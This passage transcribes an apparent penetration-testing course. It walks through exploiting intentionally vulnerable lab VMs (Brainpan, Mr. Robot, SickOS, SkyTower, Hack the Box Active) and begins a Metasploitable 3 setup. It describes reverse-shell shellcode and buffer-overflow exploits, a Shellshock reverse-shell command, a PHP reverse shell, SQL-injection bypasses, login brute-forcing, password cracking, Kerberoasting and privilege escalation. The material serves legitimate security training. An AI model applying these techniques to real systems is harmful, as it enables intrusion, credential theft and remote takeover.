to clipboard, address. Before we create our final payload, let's exit out of Immunity Debugger and run the real BrainPan executable. Go to your Downloads folder, double-click brainpan.exe, run. Okay, the listener is started. Let's go back to Kali Linux. Firstly, we need to generate shellcode with MSF Venom, which will allow us to instruct brainpan.exe to create a reverse shell from Windows to Kali Linux. Let's go over this command real quick. We have MSF Venom -p, the payload, which is going to be a Windows reverse shell, local port, which is going to be 443, local host, which is the IP address of Kali Linux that we'll be connecting back to from Windows, encoder type, which is Shikata Ganai for 32-bit, bad character, the only bad character that is always a bad character is going to be 00, and a format of Python. Let's go ahead and run that command. Alright, go ahead and copy that starting from buff equals double quote. Let's check out the next Python script, brainpan4.py. So open that with a text editor. I'm going to go ahead and insert my payload that I just generated. Let's take a look at this exploit. So go down a bit. What we have here is the payload variable that is set to 524A characters, the JMP ESP address that's backwards and in bytecode format, which will be overwriting the EIP, and a calculation which subtracts the previous values and the amount of integers in the buff variable as \x90, which is a NOP sled, followed by the buff variable. This should have all we need to acquire the reverse shell. Let's go ahead and test this out. First, let's set up a netcat listener, nc-nlvp443. Now let's run the exploit, python brainpan4.py, IP address of the Windows 7 VM, port 9999. Okay, great, we have a working exploit. So now we can try the same thing, but replace the Windows payload with a Linux payload. This should get us access to the BrainPan VM. Let's go ahead and run MSF Venom again. Taking a look at the command, it's essentially the same exact thing, except we're using a Linux reverse shell instead of Windows. Go ahead and copy that. Now let's open brainpan5.py in a text editor. Go ahead and paste that payload that we just generated. Now this is the same exact thing, except we're using the Linux reverse shell. So let's go ahead and run that against BrainPan. This time I'm going to use Metasploit's multi-handler instead of netcat because it's much more reliable. So just type in msf console. Type in use multi/handler. Set localhost to the IP address of the Kali Linux VM. Set local port to 443. Set the payload to Linux/x86/shell/reverse_TCP. Type in run to start the listener. Okay, now we're going to run python brainpan5.py against the IP address of the BrainPan VM. And the same port 9999. Alright, looks like we have successful connection. Let's go ahead and run some Python code to spawn a TTY shell for more manageability. Good. Now let's check our privileges. We're running as username Puck. See if we can access the root directory. No, we cannot. So now we have to go on to privilege escalation to get root privileges. Let's start by running a simple find command that is going to search for files with root privileges. So find /perm/4000/type F. Scroll up to the top here. Okay. So this file, user local bin validate, looks interesting. This isn't something you'd normally see in a Linux file system by default, so let's check that out. I'll just type in /user local bin validate. Okay, so looks like it is asking for some input. So that is probably going to be our way to escalate privileges, knowing CTFs. This is going to be another buffer overflow challenge. So this time it's going to be a Linux executable, and we are going to have to ship this binary to Kali Linux for more analysis. We can do that with netcat. Alright, first we're going to set up a netcat listener on Kali Linux. So nc-nlvp4445, that's the port we're using, less than symbol, and we're going to accept the data from BrainPan and put it in a file named validate. So go ahead and set that up. Now back to the shell over here on BrainPan. We're going to run a netcat command, nc-w3. It's going to make it wait. And we're going to use the IP address of the Kali Linux machine. Port 4445, greater than symbol, and the path to the validate binary. So user local bin validate. Good, we have the connection. Go ahead and run a file command on the validate file. Good, we have the Linux executable and we're ready to conduct analysis. First, let's start out by making this executable in Kali by typing chmod plus x validate. Now let's do some simple fuzzing with some Python commands. I'm going to send 100 A characters to the validate executable. Go ahead and type $/validate, $, round bracket Python -c, double quote print, single quote A, single quote times or asterisk 100, double quote, closing bracket. Okay, so judging by the response, we see validating input passed. That means no crash occurred. Let's just increment that command by 100 until it crashes. So just press up on the keyboard, change 100 to 200, fire it off. Okay, so now we see segmentation fault. That means that the executable crashed. So let's go ahead and run it in GNU Debugger, which is the command line equivalent to Immunity Debugger for Linux. We're going to use the same methodology as we did with the last executable to first find the offset using the two Ruby scripts, pattern create and pattern offset. First locate pattern create. So run that with a length of 200 this time. Go ahead and copy that pattern. Now we're going to start validate with GNU Debugger, so gdb validate. Now we're going to send this pattern to validate and see what the EIP is overwritten with. So to do that, run $, bracket Python -c, double quote print, single quote. I'm going to paste the pattern that was just created. Single quote, double quote, closing bracket. Good. So you see this value? This is the value that we want to use for pattern offset. So go ahead and save the value, just starting from 3. Just quitting out. Let's go ahead and locate pattern offset. Use that. -q and the value that we just copied. We have an exact match at 116, giving us further information that we can use to create a working exploit. First, let's verify that we can reliably control the EIP with the following Python code. First, let's start up validate in GDB. So gdb validate. So let's run our next Python command. I'm just going to paste this one in. So let me explain what this does. It sends 116 A characters followed by 4 B characters and the remaining amount of C characters for 200 characters in total. What we're trying to do is see what the EIP is overwritten with. So let's go ahead and run that. Good. So as we see here, the EIP is overwritten with 4 B characters, which are 42 in hexadecimal. Let's take a closer look at these results. Type in x/s $EAX. Good. So we see in the stack that there are 116 A characters, 4 B characters, and 80 C characters. As I stated before, this adds up to our initially discovered value of 200 bytes, which is the length at which the binary crashed. Running the command x/s $ESP shows that ESP is pointing to the C characters. This cannot be used for shellcode injection. However, as shown previously, EAX points to the shellcode and can be used to instruct for shellcode injection. Let's use objdump to find the instruction we need. This is similar to how we found the JMP ESP instruction on Immunity Debugger. After closing out of GDB, let's try to find if there's a JMP that we can use to execute shellcode at EAX. To do that, type in objdump-d validate, pipe to grep, JMP, pipe to grep again, EAX. Okay, no results. Let's try that again, but this time search for call. There we go. We have 2 addresses that we can use to utilize shellcode. 2 on the bottom. Let's use the first one here. So copy that. That is going to be the address that we use in our exploit. Now we have to search for bad characters. This is quite a bit more difficult than using Immunity Debugger, but I managed to do it by sending all characters to the executable with GDB running and analyzing the overwritten registers. I'm not going to show you each and every Python command that I ran because it took quite a bit of time and troubleshooting, but I'll show you the final command that I used and the end results. Start up validate in GDB. I'm going to run this command here. So what this does is send 116 A characters followed by 4 B characters and the remaining good characters that were left after I discovered all the bad characters. So let's send that. Let's run this command x/100x $EAX. This is going to allow us to look at the overwritten registers. Okay. So starting from 01, going to 02, 03, 04, and so on, we can visually verify that all of the remaining characters are being rendered properly. The bad characters that I discovered which would not be rendered are 09, 0A, 10, 20, and 46. These will have to be excluded from the shellcode that we generate with MSF Venom in our exploit development. Now we are going to generate our payload with MSF Venom. What this is going to do is create a payload which will execute a command bin sh, excluding the bad characters that we discovered earlier, and also 00, which I described earlier, is always a bad character with a format of Python. Okay, we're going to use this payload for our final exploit. But first you need to clean it up a little bit. As you see here, I removed the buff plus equals and all the unnecessary spaces and double quotes. So this is going to be what we use in our final exploit. Using the payload that we just generated will create our final exploit. So what this does is send the payload that we just generated, followed by 46 X90s, which is a NOP sled. So this is equal to 116 bytes in total. We had a payload of 70 bytes and a NOP sled of 46 bytes, followed by the call EAX address. See if that works. Okay, we've spawned some sort of shell. Let's take a look. Alright, so we are still the puck user, but we've added ourselves to the ANASI group. So let's see what we can find in this user's directory. Okay, so we're in the home directory. I see the user here, ANASI. Oh, and Nancy, yep. Okay. See a bin directory. Let's go there. Okay, I see a binary Anansi util. So let's see if there's any special permissions pertaining to this file. Sudo -l. Alright. So based on this result, we can sudo this file without using a password, which is going to be favorable because we do not have any passwords at the moment. So let's go ahead and try to abuse these privileges by copying the bash binary over to the Anansi util file so that we can spawn a root shell. First, let's copy bin bash over to Anansi util. cp-r/bin/bash Anansi_util. Now sudo to the full path to Anansi util as we saw in the sudo command. So sudo /home/Anansi/bin/Anansi_util. As you can see, we've escalated our privileges to root by spawning a bin bash as root, and we are finished with this lab. Go ahead and change directory to root. As you can see, we have root privileges. So go ahead and try this on your own, see if you can find any alternative ways to complete this challenge, and see what else you can do post-exploitation. In this lab, we'll be covering the enumeration and exploitation of Mr. Robot, an intentionally vulnerable Linux VM. To complete this challenge, we need to get 3 keys, all of which require differing levels of permission. You should already have downloaded the OVA file at this point. If you don't have it, refer to the previous lab for instructions on how to get it. Go ahead and double-click the Mr. Robot OVA. When prompted, click Import. Actually, first, I'm going to rename it Mr. Robot. Go ahead and right-click Mr. Robot. Click Settings. Go to Network. Change it to Host Only Adapter. Make sure the name aligns with what your Kali Linux VM is configured. Click OK. With Mr. Robot highlighted, click Start. After Mr. Robot has booted up, switch to Kali Linux. First step, as always, we need to find the IP address. To do that, we'll be typing netdiscover-i eth1, that's the host-only interface. In my case, the IP address is 192.168.56.105, but yours will be different. Let's move on to enumeration of services with Nmap. Let's go ahead and type nmap-a, IP address of Mr. Robot. Looks like the only ports that are open are 80 and 443. Let's take a look at what we can find in a web browser. So we're opening up Firefox. Let's visit the IP address of Mr. Robot. Okay, what we have here is a mock command line with a set of commands. I've already tested them all out, and it doesn't do anything worthwhile, so I won't show you each one, but feel free to play around with these commands. Let's go back to a terminal and see if we can find anything useful with dir-b. Okay, so type dir-b, http, :// IP address of Mr. Robot. After testing most of these URLs, the most interesting finding here is the WordPress login and robots.txt. So let's go ahead and take a look at those in the web browser. Just going to right click and open link on that, also for robots.txt. What we have here is a WordPress login page. This is probably going to be our way into Mr. Robot. Before we try fishing for exploits, let's look at robots.txt. Alright, so here I see a text file named key1of3, which should contain our first key, and a file named fsaucity.dict, they meant society, which I can assume is a dictionary file of either usernames or passwords. So let's take a look at both of these. Just save these. Okay, there's our first key. You can save that for later. Okay, opening up a terminal and going to the downloads page, let's take a quick look at this file. So I'm going to use V to open up fsaucity.dict. So as you see here, there are a ton of lines here. Lots of words. Let's see, here it is, the amount of lines. But some quick analysis shows me that there are a ton of repeating words. So I can cut only the unique ones from the file. Let me just close out of this and show you. So if I do a grep and search for the string true, which was the first word in that file, you can see that it's repeated numerous times. So grep true, name of the file. Just go up a bit. You see? It's repeated. That's easily fixed. Just going to run a cat command on the file, pipe it to sort, pipe that to unique, direct that to a file named fsocietyunique. Let's compare the two files now. So we have a word count -L, fsociety unique. So we have 11,451 lines now, which is still a lot, but it's less than it was. Let's see what it was on the other file. Just saw that, but let's check again. Yeah, look at that. 858,160. So that cut it down significantly. Now let's direct our focus to the WordPress login. So open up Firefox, click the top right to open the menu, click Preferences. We're going to be setting up the proxy for Burp Suite, which will help us analyze the web application better. So type in proxy into the search box, click Settings. I already had it set up earlier, so this was gone over earlier. You just have to put the loopback address here, check the use proxy server for all protocols, port 8080, and make sure that this box is empty. Click OK. Let's go ahead and load up Burp Suite. So just click the left-hand side here, Burp Suite icon. Temp project, click Next, use Burp defaults. Click the Proxy tab, and for now, turn the intercepting proxy off. Now let's go to the WordPress login page. That was the IP address of Mr. Robot and /login. Turn the intercepting proxy on. I'm going to populate the username and password input with test and test. Click Login. Okay, here's some parameters. Let's go ahead and right-click and send to repeater. Now click Go. Okay, so in the error message, it specifies what was invalid, which is the username. So with that knowledge, we can enumerate valid users by brute forcing the parameter for usernames, which in this case is the log parameter. We can use that dictionary file that we found to see if we can get any valid usernames out of it. To do this, the best tool is Hydra, which brute forces services at a reasonably quick pace. Before we switch to command line, let's go ahead and copy these parameters here. Go ahead and open up a terminal. I am in the location where fsociety unique is. So this Hydra command is going to use this dictionary file for usernames, which is the capital L switch. The single password that is going to be used is test. And here is the IP address of Mr. Robot. We're using the HTTP post form method. And as you see here, this is the location of the login page, wp-login.php. So that is the first part, separated with colon. Then we have the log parameter and the pwd parameter that we pulled from the Burp Suite request. And here are the variables user, which is set to the fsociety unique password list, well, username list in this case, and the pwd parameter and the pass variable, which is set to test. And the rest of the things we have here from Burp Suite, separated with colon. F equals invalid username specifies an invalid or false response. So any other response will be interpreted as positive. Let's go ahead and run that. Okay, so after a bit of time, we see that we have a result for Elliot. This is pretty intuitive since that's the main character in the show Mr. Robot. That's also the name of the VM. So let's go back to Burp Suite and see what the actual response looks like if we enter Elliot as the username. Okay, all I'm going to do here in Repeater is change test to Elliot. Click go. Let's check out the response here. All right, it's different now. The password you entered for the username Elliot is incorrect. So this indicates that Elliot is a valid username, but we need to find the password now. So our next step is to brute force the password with the same dictionary file. So let's go back to our terminal. Let's cancel out of this. All right, so let's take a look at this Hydra command. I've changed the L switch to lowercase because we're only using one username, which is Elliot. And I've changed the P to uppercase because we're using the F Society unique dictionary file. Everything else is the same except for the failure string that we're looking for is incorrect. That's what we're going to see if we get a failed login with a valid username, as we just saw in Burp Suite. So let's go ahead and run this command and brute force the password for Elliot. All right, looks like we have a password of capital ER28-0652. So let's try that in the WordPress login. First, turn off the intercepting proxy. So we had the username of Elliot and the password that we just found with Hydra. All right, so we're logged in. Knowing WordPress, we likely need to upload a PHP reverse shell. You can grab one from Pentest Monkey, which is a great resource for all types of shells. So I'll just open up another tab here and go to pentestmonkey.net. Just go ahead and grab this PHP reverse shell. Save it. Let's open the containing folder. Right click, extract here. There we go. Back to WordPress. So after trying to upload it to every single upload option, I found a solution that works. Under Appearance and Editor, we have some templates. So we're able to replace this template with our reverse shell PHP code. As you see here, I can edit this text and then update the file. So I'm just going to go ahead and open the reverse shell file and get the text from the code. So to our downloads folder, the PHP file here, I'm going to open it with text editor. Just copy all the text. Actually, before I do that, we have to make a change. So the IP address of the Kali Linux VM and whatever port you want, I'm going to change it to 4444. Save that. Copy it. And just replace all the text here in 404.php with the reverse shell here. Update file. Good. Okay, with the terminal open, start a netcat listener by typing nc-nlvp 4444 or whatever port you used in your reverse shell PHP file. Now let's visit that 404.php file that we edited. So IP address of Mr. Robot /404.php. There we go. As you see, we have a reverse shell. Let's go ahead and spawn a TTY shell. Good. Let's take a look at these directories starting from home. Okay, we have a directory robot. Let's go there. Okay, so we have two files here. One of them is the key. Let's grab that real quick. Ooh, we can't get that yet, so we need to escalate our privileges. Let's take a look at the other file. Okay, so this looks like some sort of password hash. So username robot and a hash. Let's just grab that. I'll just grab the hash. Just remember the username robot. Let's open another terminal. If you haven't done so already, unzip rocku.txt. So gunzip /user share word lists rocku.txt.gz. Now I'm going to attempt to brute force this password hash. So first let's create a file named hash. And I'm going to paste the hash that we just found in the file in Mr. Robot. Now let's use hashcat. So hashcat -a0-m0 hash. File path to rocku.txt, user share wordless rocku.txt --force. After a short amount of time, I see that the password was cracked, and it is the alphabet in all lowercase. So let's just copy that, go back to our reverse shell. Now let's switch user to robot using the password that we just found. So su robot, password. Good. So now we're logged in as robot. Let's go ahead and grab that key file. So now we have 2 out of 3 keys, but we still need root privileges. Let's run a quick find command to see all the files that are running as root. So find /perm-4000-type f. Okay, so I immediately notice nmap is running as root. This is a well-known way to escalate to root. Let's just go to the bottom here. All right, so let's type in nmap --interactive. Good. Let's just run a who am I. Good, so we are running as root. Let's type in !sh. There we go. We're logged in as root. Let's get our third key. All right, there's our last key. We're now done with this lab. Let's move on to the next objective. This lab will cover the enumeration and exploitation of SICK-OS, another intentionally vulnerable Linux VM. Like with most of our other challenges, the objective is to get root access. You should have downloaded this already if you followed the previous lecture. Double-click the OVF file. I'm just going to change the name here. Click Import. Right-click SICOS. Click Settings. Network. Change to Host Only. Make sure it's the same thing as you have configured for Kali Linux. This will facilitate internal network connectivity. Click OK. SICOS highlighted, press Start. Alright, with your Kali Linux box open, open up a terminal, and let's find the IP address with netdiscover. So netdiscover -i eth1. Okay, we found the IP address. Let's go ahead and copy that and run an nmap scan. Alright, so nmap-a IP address of SICOS. Nmap results show that there's a SQUID HTTP proxy on port 3128, so let's go that route. I'm going to hit it with a quick Nikto scan first to see if there's any easily detected vulnerabilities. So we're going to type Nikto-h, IP address of SICOS, --use proxy, IP address of SICOS, and colon, and the port 3128. Okay, so the most interesting part here is the CGI-bin status. This is well known for the infamous shell shock vulnerability. What this is essentially is a vulnerability in Bash that allows remote code execution. Let's see if it's actually vulnerable by trying to exploit it with a simple curl command. What this command does is send a GET request to SICOS with a referrer header that's specifically crafted to exploit shell shock, attempting to invoke the Linux command id. Alright, as you can see here, we get the id command's results in the response of the GET request. Now let's try another one, this time to receive a reverse shell. This command is pretty much the same, although changed to a bash command which will attempt to create a network socket with Kali Linux over port 4444. Before attempting the command, let's set up a multi-handler listener in Metasploit. So go to a different terminal here, type in MSF console. Use multi/handler. Set lhost to the IP address of the host-only IP address of Kali Linux. Set local port to 4444. Set payload to the Linux reverse shell payload for 32-bit systems. Run to start the listener. I noticed a mistake in this curl command. I set the IP address of the bash command to SICOS's IP, not the host-only IP address of Kali Linux. This needs to be changed. Make sure that you have the correct IP for your Kali Linux host-only interface. Great, now we have a reverse shell. Let's go ahead and spawn a TTY shell for more manageability. Good. So it looks like we're running under the www-data user, so we're going to have to find a way to escalate our privileges. Let's go ahead and cat the Etsy password file to see what kind of users are on the system. Okay, looks like we have one user here that was created is cycos. Here's a find command that's piped to grep that will search for passwords and files with the .php extension, matching the case-insensitive string pass, including 3 lines above and 3 lines below the match. Very good. So in this config.php file, I found some MySQL database settings here, and we have a user of root and john@123. Earlier, we discovered a user cycos in the Etsy password file. So let's see if the password john@123 will work on that user. So su cycos. Must be run from a terminal. So let's see if we can SSH into that user. All right, so SSH cycos at IP address of cycos. Let's try that password, john@123. All right, good, we're in. So we're in the user cycos. We've escalated our privileges to a low privilege user in a full terminal, but we are still not root. One of the easiest ways to escalate your privileges if there's a poorly configured sudoers, you just do sudo su. Let's see if that works. Enter your password. There we go. Very easy. There's another way to get into cycos initially that doesn't involve shell shock. Let's see if you can figure that out on your own. Before I finish this, let's grab our flag. There it is. This lab will focus on the enumeration and exploitation of SkyTower 1, an intentionally vulnerable Linux VM from VulnHub. Double-click the VBox file. Right-click SkyTower. Click Settings. Go to Network. Make sure that you have the host-only interface selected and the same one that you have for Kali Linux. Click OK. With SkyTower highlighted, click Start. As always, first let's try to find the IP address with NetDiscover. Found the IP address. Let's go ahead and copy that. Run over to nmap. nmap-a IP address. Okay, so nmap scan results show we have SSH filtered on port 22. We have an open port with an Apache web server on port 80 and a squid proxy on port 3128. Let's go ahead and open a web browser and check out the web server. So open up Firefox. IP address of SkyTower here. Okay, so we have a login page. All right, I'm going to start by doing some simple fuzzing. I'm just going to put in test, single quote, test, single quote for the email and password. Okay, good. There's a MySQL error. This indicates that there is a SQL injection vulnerability on Sky Tower. So let's try to bypass the authentication. Just go back. Okay, now I'm going to try single quote or 1 equals 1 hyphen hyphen. In MySQL language, this is going to attempt 1 equals 1 followed by a comment, which is always true to result in an authentication bypass. Let's try that. Same thing for the password. Okay, so it looks like we have filtering in place. As you see from the verbosity of the error, it shows the output with the absence of the equal sign and the or text. So we're going to have to find a way to bypass the filtering. Let's go back. Alright, now I'm going to try single quote, pipe, 8, greater than symbol, 7, and hash. So what this does is send a MySQL query of 8 is greater than 7, which is true, followed by a comment. This should bypass the filtering and authentication. Just paste that into the password as well. Awesome. Let's take a look here. So it bypassed the authentication and gave us a username and password. Now it says we need to SSH into the account, but as we saw before, SSH is filtered. But there was also a squid proxy. So let's see if we can leverage proxy chains to connect to the SSH. With the terminal open, let's go ahead and change the proxy chains configuration. So v etcproxychains.conf. Just going to do a search for proxy list there at the bottom. So I'm going to remove this socks entry. Oops. And I'm going to add HTTP and the IP address of Sky Tower, followed by the port number 3128. Save that. Okay, now let's try to use proxy chains to SSH into the user John. We have proxy chains SSH John at IP address of Sky Tower. Yes. Enter your password. Here is John. Okay. So it immediately canceled the connection. Now let's try using the proxy chains command again, but this time see if we can execute a command ID. So proxy chains SSH John at IP address of Sky Tower, single quote ID, single quote. Here is John, the password. Good. Okay, so we are able to execute commands. So just up on the keyboard this time, instead of ID, I'm going to do bin bash. Here is John. Let's see if that worked. It did. So now we have a shell. Now let's try to spawn a TTY shell. Okay, well, looks like we're logged in as user John. Let's see if we can log into the, or change directory to the root directory. No, we can't. Okay, so we need to escalate privileges at this point. Now I'm going to run a find command, pipe to grep, to search for the string pass within files that have the .php extension. This is to try to find files with passwords in them. Alright, looks like MySQL has a username and password of root and root. Let's check this out. Since we don't have a TTY shell, we're going to have to use the -e switch for MySQL to execute commands. Let's get started. This first MySQL command will show the databases. Okay. I'm going to check out the SkyTech database first. This command is going to use the SkyTech database and show all tables within. Okay, we have the login table. Let's check that out. Okay. This command is going to use the SkyTech database and select all from the login table. Awesome. We have a couple of users and passwords here. Okay, so we already have access to the first user, John, so let's just try the next one on the list, Sarah, with the password, I hate this job. Same proxy chains as before, so proxy chains SSH Sarah at IP address of Sky Tower, single quote /bin/sh, single quote. I hate this job. Okay, good. We are now logged in as Sarah. Let's try to spawn a TTY shell. Okay, couldn't do it. Let's see if Sarah has sudo privileges. So sudo -l. Okay. Looks like they do have sudo privileges for this accounts directory. There's a problem here because I'm currently unable to sudo because I do not have a TTY shell. Let's check out the bashrc file and see how bash is set up to run interactively. Here it is. So I'm just going to cat that file. As you can see here, there's an exit command at the end. This is why we were unable to SSH without sending the binsh command. Let's remove the bashrc file and try to SSH again. This time I'm just going to use the proxy chains command to SSH into Sarah. Great, now we have a fully interactive shell. Alright, let's revisit what we can do with sudo. So sudo -l. Alright, we're able to cat and ls. And let's check out the accounts directory. So sudo ls accounts. All right. Let's try something else. So accounts Alright, so we're able to use accounts to traverse other directories. Let's try that out on the root directory. Okay, I see that there is a file in the root directory, flag.txt. We can also cat, so let's cat that file. Alright, so the contents of flag.txt tells me the root password is the Sky Tower. Let's try to SSH into that. So proxy chains SSH root at IP address of Sky Tower. Password is the Sky Tower. Alright, we're logged in as root. That's it, game over. On to the next one. This lab will provide an overview of Hack the Box and show you how to get set up and start hacking their VMs. Hack the Box is one of the best platforms for pen testing, hands down, offering free and paid CTF-style VMs to hack over their VPN. Obviously, the paid version has more content. However, there's a catch. You have to hack your way into their site in order to get an invite code. I highly suggest that you stop this video now and try it by yourself prior to continuing. Otherwise, I'll show you how to get in. This information is already public knowledge, but it's always best to try it by yourself first. Let's get started. Click Join. Join HTTP. Alright, so here's the page that you need to hack in order to get an invite code. As always, when hacking web applications, I highly suggest that you have Burp Suite up and proxying web traffic. I already went over this before, but I'll quickly go over how to set it up on Firefox. So click the right-hand box here to open menu, Preferences, search for Proxy, Settings, and here you go. You have the loopback addressed here and port 8080. And no text in the no proxy for box. Alright, first right click, view page source. Alright, this is hard to read, so I'm just going to copy all this, put it in a text file. Open up LeafPad here. Good. Have word wrap on. Viewing the page source, I see a ton of HTML here. It may look like a bunch of gibberish to those not well versed in writing or analyzing HTML code, but there's some critical information here to go forward with obtaining the invite code. Just going to search for .js. So we have a couple pointers here to some JavaScript files. Now the one I want to focus on is the invite API.min.js file. So let's just copy that and try to go to that URL. So back to the browser, just going to type in https hackthebox.eu and the JS invite API.min.js. Taking a look at this JavaScript code, I see that there are several functions that we can attempt. I see one is named make invite code. This sounds promising because that's what we need. Back to the invite page. Click on the top right here to open menu. Click Web Developer. Click Toggle Tools. Alright, now we're going to invoke the make invite code function just by typing in make invite code and 2 brackets. Click the arrow here to expand. Okay, what we see here is a string encoded with base 64. So let's go ahead and copy this string and decode it in Burp Suite. With Burp Suite open and in the decoder tab, paste the string you just copied, minus the double quotes. Decode as base 64. Okay, in plain text we receive a set of instructions. In order to generate the invite code, make a post request to API invite generate. Let's go ahead and do that. Before proceeding, go to the Proxy tab and enable the intercepting proxy. Now let's go to API invite generate. Remember, the instructions said send a post request, not a get request. So before we forward this traffic, let's just change that get to a post. Click forward. All right. So it looks like we have another encoded string. Looks like base 64 again. So let's just copy that. Back to the Burp Suite decoder. It decoded as base 64. So this here is a code that you can use to register to hack the box. Copy that. Go to the Proxy tab and turn off your intercepting proxy. Enter the decoded registration code. Click Sign Up. Now enter your registration details, log in, and I'll cover how to set up the VPN. After logging in, click Access under Labs. Click Connection Pack. Save file. Open a terminal. Go to your downloads location. Type in OpenVPN, the name of the downloaded OVPN file. Looks good. Let's go back to the Hack the Box webpage and make sure we're connected. If you refresh this page, you should see server status and connected with these green check marks. Now you're VPN'd into their environment and can start hacking their VMs. At this point, I suggest that you start hacking whatever VMs they have available to you, or you can follow the next lecture to get a walkthrough on a retired Hack the Box VM. Please be advised that we're currently using the free version of Hack the Box, so you may not be able to access the same VMs that I can at the time of this recording, as they frequently change. However, you can purchase VIP on Hack the Box to access all machines for $10 per month or $100 per year, which I highly recommend. It is best to try to figure out how to hack these VMs on your own, but if you get stuck, try to see if there's a walkthrough online for the particular VM you're trying to hack. To get started quickly, I suggest that you scan the IP address space to see which VMs you're allowed to access with your free subscription and go from there. To do this, simply nmap-a in the IP address space. As you can see from the nmap results, there's a ton of different VMs to hit. At the time of this recording, there are 23 hosts up, all of which you're able to hack. Now you can take it from here. This lab will show you how to enumerate and exploit HackTheBox's retired Windows VM, Active. The object of Active is to access flags which require varying levels of permissions. Please note, in order to continue, you'll need to be connected to HackTheBox's VPN. This Active VM is available for free during the time of this recording. However, this status may change. In this case, you can either purchase VIP, which costs $10 per month or $100 per year at the time of this recording, or do a different VM that is available for free subscribers. In order to see if a HackTheBox VM is available for free, click the button all the way to the right of a VM to show status. Status check right here. Green checkbox means that it is available. Red X means that it isn't. Also, you can scan the IP range of the HackTheBox VMs and see which ones are accessible, as I covered earlier. If you're having issues accessing the VM in any way, you have the option to reset it. Here's the button to reset it right here. And here's the IP address of the VM. Let's go to a terminal. First, let's scan it with nmap. After looking at the results of the nmap scan, I see a bunch of open ports here, but the most interesting and likely to be exploited here is SMB, which is running on port 445. Now let's run enum for Linux to get more information about our target's SMB if possible. So enum for Linux, -S, IP address of Active. We see under Share Enumeration a disk named Replication. Let's try to access this directly with SMB Client. So type in SMB Client / IP address of Active / replication. For password, just leave it blank, hit enter. As you can see, we're able to access the share anonymously, using no password for root. Let's go through these directories to see if there's anything useful for us. This groups.xml file looks interesting. Let's download it and take a look. Let's take a look at the contents of that file. Okay, so there's a user for the active.htb domain, which is svc_tgs. And there is also a C password value, which is a group policy preferences or GPP encrypted string. There's a well-known tool named GPP-decrypt that we can use to obtain the plain text of this password. Let's use that. So type in GPP-decrypt. And let's just take this C password value and paste it here. Hit enter. Alright, so in barely any time, we've gotten the plain text of the password. Let's try using SMB client to log into that user. So type in SMB client / IP address of active / users. That's the directory we're going to have to try to access, -u. Username is svc_tgs. And we have the password right here. Okay, good, that worked. Now let's take a look at what's in these directories. Okay, we found our first flag, user.txt, in the desktop of user svc_tgs. However, we still have no interactive shell and still need to escalate our privileges to system. Let's switch our focus to another service that was discovered with Nmap, which is Kerberos over port 88. We need to see if there are any service principal names which are used by Kerberos to associate service instances with service login accounts. What we want is the password for administrator so we can get ourselves an interactive system-level shell. Now let's add the Windows domain active.htb to our local Kali Etsy host file. So I'll go ahead and type vi/etsy/hosts. Enter the IP address of active and active.htb. Save that. Now we're going to need to get a Python script to assist with getting the admin SPN. This is called getuserspn.py. Let's go over to Firefox and get the Python code. Here's the GitHub page. We're just going to copy all that text, go back to a terminal. Now I'm going to create a new file, name it getuserspns.py. Paste the text we just copied, save that file. Now let's make sure that impacket is up to date. So apt-get install python-impacket. Now let's run the script. As you see here, we needed the domain, the username, and password. Very good. Looks like we have the administrator's SPN. Now we need to decrypt it. For this, we'll be using Hashcat. So just copy the entire result. I'm creating a new file, hash.txt. Paste the result, save. Now let's run Hashcat to brute force the password with the dictionary attack. Alright, we've decrypted the password. It is Ticketmaster 1968. With this new information, we should be able to use Metasploit's Windows/SMB/PS exec exploit to get a shell with system privileges. Now let's run MSF console. Type in use exploit /Windows/SMB/PS exec. Set rhost, IP address of active. Set SMB user to administrator. Set SMB pass to the password that we just decrypted, Ticketmaster 1968. Now run. Good, we have an interpreter shell. Now let's check our privileges. Let's spawn a shell. There we go, we've confirmed that we have system privileges. Now let's check out administrator's desktop because that's where the flag was for the user earlier. We are now finished the active VM. As you can see here, root.txt is the last flag required to win. Please try out the other Hack the Box VMs on your own, as these are great practice. Now we're going to set up, enumerate, and exploit one of the only available intentionally vulnerable Windows Server 2008 VMs, Metasploitable 3. First, we're going to need to download and install Vagrant, which is a tool that simplifies the building and managing of virtual machine environments. I'm on Windows, so I'm going to be using that version. Go ahead and download and execute the MSI file to install. Next, accept, next, next, install. Once the download is complete, restart your system. Now open a command prompt with administrative privileges. Now we need to create a Vagrant file by typing in vagrant init. This is going to create a Vagrant file in your current directory. Now visit this GitHub site to grab the Vagrant file configuration for Metasploitable 3. This URL and all commands, as always, is attached to this lecture. Copy this configuration and paste it into the Vagrant file that you just created in the System32 directory. Go ahead and open Notepad as administrator. Now go to the Vagrant file that you created in System32. Open. Remove all of the text and paste the text that you copied from the Metasploitable 3 configuration and save. Now back to your administrative command prompt. Type in Vagrant up. Once Vagrant is finished, we'll have an intentionally vulnerable Windows 2008 VM and a vulnerable Ubuntu VM to test on. We should now be able to open VirtualBox Manager and have them already loaded. At this point, I suggest that you restart your computer, because I had some VirtualBox errors that were resolved by rebooting. As you can see, we have two new VMs loaded into VirtualBox Manager. We're going to be focusing on the Windows 2008 VM in this lab, but I suggest that you also hack the Ubuntu VM on your own. Before starting Metasploitable 3, let's make some configuration changes. Right-click the Windows 2008 VM, click Settings, go to Network, change to Host Only, make sure it's the same one you have for Kali Linux. There's two by default, just make sure they're both host only. Go to Display. Now raise the video memory, make it at least 27. Go to Remote Display. Uncheck Enable Server. Click OK. Start the VM. Once it's loaded, you should see this screen. Now let's go to Kali Linux. First of all, let's find the IP address. Note that NetDiscover will not work for this particular VM, so we'll have to use an alternative method for host discovery. Nmap is also a great tool for host discovery, so let's use that. This command will run a host discovery scan on the host-only IP address space. My results show that we have several hosts up here. Remember that there are two NICs configured on Metasploitable 3, so there will be two separate IP addresses. However, they're going to serve the same purpose for our lab. If you're unsure which IP is which, just scan them all until you find the correct one. Now let's enumerate some of the services. Nmap-A, IP address. Nmap results show a big attack surface. One thing that sticks out to me is this Apache web server that's running on a non-standard port. Let's go ahead and visit that in a web browser and see what we get. So visit the IP address of Metasploitable and port 8383. We see here that we have a login page for Manage Engine Desktop Central Mine. Let's see if there's any known vulnerabilities pertaining to this service with searchsploit. So go to a terminal real quick. Just type in searchsploit, manage engine, desktop central 9. All right, we get a couple of results here. So there are several known vulnerabilities, but the one that sticks out the most to me is the Ruby exploit, which is built into Metasploit. Let's try that first. Type in MSF console. Now set up the exploit. So use exploit /Windows/HTTP/manage engine _connection ID _write. If you're wondering how I found this information, just Google the string desktop central metasploit and you'll get this exploit module on the first result. That's how I quickly found the module to use here. Set our host to the IP address of Metasploitable3. Remember that there's 2 IPs configured, so if one doesn't work, try the other one. Set the R port to 8383. Set SSL to true. Set 